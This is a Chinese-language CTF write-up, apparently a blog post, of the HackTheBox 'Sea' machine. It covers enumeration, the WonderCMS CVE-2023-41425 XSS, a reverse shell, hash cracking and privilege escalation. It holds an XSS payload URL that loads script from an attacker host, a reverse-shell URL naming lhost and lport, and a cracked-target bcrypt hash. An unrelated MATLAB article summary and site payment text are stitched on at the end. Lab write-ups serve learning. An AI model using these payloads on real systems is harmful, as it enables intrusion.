记一次渗透测试实战之Sea

Web渗透

端口扫描

使用nmap进行端口探测

发现存在22和80端口开放。

访问80端口,然后使用F12查看源代码。

目录爆破

接着使用工具爆破目录
发现存在一些 目录。
访问README.MD,发现是WonderCMS

CVE搜索

使用浏览器搜索,发现存在CVE漏洞。

访问contact.PHP.

SSRF漏洞

测试功能点。

发现存在SSRF漏洞。

CVE-2023-41425

接着访问index.php?目录

漏洞尝试

http://sea.htb/index.php?page=loginURL"></form><script src="http://10.10.16.3:8000/xss.js"></script><form action="

使用exp.py脚本尝试,发现未能攻击成功。

访问发现不能成功利用。
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.16.3&lport=4444

查看JS文件。

获取Webshell

修改之后,重新尝试,成功获取shell。

获取交互式SHELL。

横向移动

内网信息收集

然后进行内网信息收集。

查看/etc/passwd

查看数据库文件。

查看目录。

获取数据库文件

测试localhost

查看数据库文件,获取password。

hash解密

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
使用hashcat解密,获取密码。

接着使用netexec验证ssh吗密码。

ssh登录

使用SU进行切换。

代理搭建

接着搭建代理。

搭建客户端。

访问web站点。

漏洞尝试

发现可以进行文件读取。

文件读取

然后读/etc/password

测试发现存在SQL注入

确定分组权限。

获取root权限

然后添加用户到管理员组,获取root权限。

内容概要:本文详细介绍了一个基于MATLAB实现的线性回归(LR)电力负荷预测项目实例,涵盖了从项目背景、模型架构、算法流程、代码实现到GUI界面设计的完整开发过程。项目通过整合历史负荷、气象数据、节假日信息等多源变量,构建多元线性回归模型,并结合特征工程、数据预处理、正则化方法(如岭回归、LASSO)和模型评估指标(RMSE、MAPE、R²等),提升预测精度与泛化能力。文中还展示了系统化的项目目录结构、自动化部署脚本、可视化分析及工程集成方案,支持批量预测与实时滚动更新,具备高度模块化、可解释性强、部署友好的特点。; 适合人群:具备一定MATLAB编程基础,从事电力系统分析、能源管理、智能电网或数据建模相关工作的工程师、研究人员及高校师生。; 使用场景及目标:①应用于城市电力调度、新能源消纳、智能楼宇用能管理等场景下的短期负荷预测;②帮助理解线性回归在实际工程项目中的建模流程、特征处理与模型优化方法;③通过GUI界面实现交互式预测与结果可视化,支持工程落地与决策辅助; 阅读建议:建议结合提供的完整代码与GUI示例进行实践操作,重点关注数据预处理、特征构造、正则化调优与模型评估部分,深入理解各模块的设计逻辑与工程封装思路,以便迁移到类似的时间序列预测任务中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值